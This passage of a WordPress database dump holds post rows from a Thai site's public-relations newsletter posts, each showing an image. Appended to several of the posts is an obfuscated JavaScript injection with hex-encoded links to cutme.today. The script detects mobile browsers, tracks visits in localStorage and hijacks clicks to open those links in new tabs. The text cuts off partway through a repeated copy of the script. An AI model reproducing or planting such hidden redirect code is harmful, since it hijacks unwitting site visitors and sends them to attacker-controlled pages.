(199,1,'2024-07-27 22:39:50','2024-07-27 15:39:50','<!-- wp:image {\"id\":198,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/3-2-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-198\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','197-revision-v1','','','2024-07-27 22:39:50','2024-07-27 15:39:50','',197,'http://pakhaeng.ssk.in.th/?p=199',0,'revision','',0),
(200,1,'2024-07-27 22:40:25','2024-07-27 15:40:25','<!-- wp:image {\"id\":201,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/4-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-201\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-5','','','2024-07-27 22:40:28','2024-07-27 15:40:28','',0,'http://pakhaeng.ssk.in.th/?p=200',0,'post','',0),
(201,1,'2024-07-27 22:40:08','2024-07-27 15:40:08','','4-2566','','inherit','','closed','','4-2566-2','','','2024-07-27 22:40:08','2024-07-27 15:40:08','',200,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/4-2566-1.png',0,'attachment','image/png',0),
(202,1,'2024-07-27 22:40:25','2024-07-27 15:40:25','<!-- wp:image {\"id\":201,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/4-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-201\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 